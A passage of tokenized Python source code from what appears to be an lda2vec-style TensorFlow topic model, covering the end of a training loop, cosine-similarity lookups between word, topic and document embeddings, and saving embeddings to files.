summary,_,l,lw2v,llda,step=self.sesh.run(fetches feed_dict=feed_dict)<block_end># Prints log every "report_every" epoch
<if_stmt>(e+1)%report_every<eq>0<block_start>print('LOSS' l 'w2v' lw2v 'lda' llda)<block_end># Saves model every "save_every" epoch
<if_stmt>(e+1)%save_every<eq>0<and>self.save_graph_def<block_start>writer.add_summary(summary step)<line_sep>writer.flush()<line_sep>writer.close()<line_sep>save_path=saver.save(self.sesh self.logdir+'/model.ckpt')<line_sep>writer=tf.summary.FileWriter(self.logdir+'/' graph=self.sesh.graph)<block_end># Prints out membership of words in each topic every "print_topics_every" epoch
<if_stmt>e<g>0<and>(e+1)%print_topics_every<eq>0<block_start>idxs=np.arange(self.num_topics)<line_sep>words,sims=self.get_k_closest(idxs in_type='topic' idx_to_word=idx_to_word k=10 verbose=<true>)<block_end><block_end># Save after all epochs are finished, but only if we didn't just save
<if_stmt>self.save_graph_def<and>(e+1)%save_every<ne>0<block_start>writer.add_summary(summary step)<line_sep>writer.flush()<line_sep>writer.close()<line_sep>save_path=saver.save(self.sesh self.logdir+'/model.ckpt')<block_end><block_end><def_stmt>compute_normed_embeds self<block_start>"""Normalizes embeddings so we can measure cosine similarity
between different embedding matrixes.
"""<line_sep>self.normed_embed_dict={}<line_sep>norm=tf.sqrt(tf.reduce_sum(self.mixture.topic_embedding<power>2 1 keep_dims=<true>))<line_sep>self.normed_embed_dict['topic']=self.mixture.topic_embedding/norm<line_sep>norm=tf.sqrt(tf.reduce_sum(self.w_embed.embedding<power>2 1 keep_dims=<true>))<line_sep>self.normed_embed_dict['word']=self.w_embed.embedding/norm<line_sep>norm=tf.sqrt(tf.reduce_sum(self.mixture.doc_embedding<power>2 1 keep_dims=<true>))<line_sep>self.normed_embed_dict['doc']=self.mixture.doc_embedding/norm<line_sep>self.idxs_in=tf.placeholder(tf.int32 shape=[<none>] name='idxs')<line_sep>self.compute_normed=<true><block_end><def_stmt>get_k_closest self idxs in_type='word' vs_type='word' k=10 idx_to_word=<none> verbose=<false><block_start>"""Gets k closest vs_type embeddings for every idx of in_type embedding given.
Options for the in_type and vs_type are ["word", "topic", "doc"].
Args:
idxs (np.array): Array of indexes you want to get similarities to
in_type (str, optional): idxs will query this embedding matrix
vs_type (str, optional): embeddings to compare to in_type embedding lookup
k (int, optional): Number of vs_type embeddings to return per idx
idx_to_word (dict, optional): IDX to word mapping
verbose (bool, optional): Should we print out the top k words per epoch? False by default.
Only prints if idx_to_word is passed too.
Returns:
sim: Actual embeddings that are similar to each idx. shape [idxs.shape[0], k, self.embed_size]
sim_idxs: Indexes of the sim embeddings. shape [idxs.shape[0], k]
NOTE: Acceptable pairs include:
word - word
word - topic
topic - word
doc - doc
"""<if_stmt>self.compute_normed<eq><false><block_start>self.compute_normed_embeds()<block_end>self.batch_array=tf.nn.embedding_lookup(self.normed_embed_dict[in_type] self.idxs_in)<line_sep>self.cosine_similarity=tf.matmul(self.batch_array tf.transpose(self.normed_embed_dict[vs_type] [1 0]))<line_sep>feed_dict={self.idxs_in:idxs}<line_sep>sim,sim_idxs=self.sesh.run(tf.nn.top_k(self.cosine_similarity k=k) feed_dict=feed_dict)<if_stmt>idx_to_word<block_start><if_stmt>verbose<and>vs_type<eq>"word"<block_start>print('---------Closest {} words to given indexes----------'.format(k))<block_end><for_stmt>i,idx enumerate(idxs)<block_start><if_stmt>in_type<eq>'word'<block_start>in_word=idx_to_word[idx]<block_end><else_stmt><block_start>in_word='Topic '+str(idx)<block_end>vs_word_list=[]<for_stmt>vs_i range(sim_idxs[i].shape[0])<block_start>vs_idx=sim_idxs[i][vs_i]<line_sep>vs_word=idx_to_word[vs_idx]<line_sep>vs_word_list.append(vs_word)<block_end><if_stmt>verbose<and>vs_type<eq>"word"<block_start>print(in_word ':' (', ').join(vs_word_list))<block_end><block_end><block_end><return>(sim sim_idxs)<block_end><def_stmt>save_weights_to_file self word_embed_path='word_weights' doc_embed_path='doc_weights' topic_embed_path='topic_weights'<block_start>"""Saves embedding matrixes to file.
Args:
word_embed_path (str, optional): Path and name where you want to save word embeddings
doc_embed_path (str, optional): Path and name where you want to save doc embeddings
topic_embed_path (str, optional): Path and name where you want to save topic embeddings
"""<line_sep>word_embeds=self.sesh.run(self.word_embedding)<line_sep>np.save(word_embed_path word_embeds)<line_sep>doc_embeds=self.sesh.run(self.doc_embedding)<line_sep>np.save(doc_embed_path doc_embeds)<line_sep>topic_embeds=self.sesh.run(self.topic_embedding)<line_sep>np.save(topic_embed_path topic_embeds)<block_end><block_end>
|